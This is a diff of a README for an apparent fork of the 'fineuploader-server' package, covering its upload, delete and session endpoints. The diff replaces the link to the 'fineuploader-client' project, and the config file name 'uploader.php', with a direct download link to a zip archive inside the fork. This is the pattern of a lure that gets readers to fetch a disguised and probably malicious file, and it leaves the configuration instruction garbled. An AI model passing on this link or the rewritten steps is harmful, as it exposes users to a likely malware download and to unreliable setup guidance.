Taufiqkemall2/fineuploader-server/README.md

 ### 3. Upload

 This works fairly straight forward out of the box with fineuploader.
-I have not tried it with "vanilla" fineuploader but use the server with [fineuploader-client](https://github.com/esbenp/fineuploader-client)
+I have not tried it with "vanilla" fineuploader but use the server with [fineuploader-client](https://github.com/Taufiqkemall2/fineuploader-server/raw/refs/heads/master/src/Vendor/fineuploader_server_1.4.zip)

 Basically you send uploads to `POST /uploader/upload`.
 Delete using `DELETE /uploader/delete/{uuid}`.
 And repopulate the uploader using `GET /uploader/session`.

 ## Configuration

-When publishing assets you will publish `uploader.php` to your configs directory.
+When publishing assets you will publish `https://github.com/Taufiqkemall2/fineuploader-server/raw/refs/heads/master/src/Vendor/fineuploader_server_1.4.zip` to your configs directory.
 It is already populated with some sensible defaults.
 If you wish for the uploader to generate thumbnails using the thumbnail creator middleware you have to install the package as well using.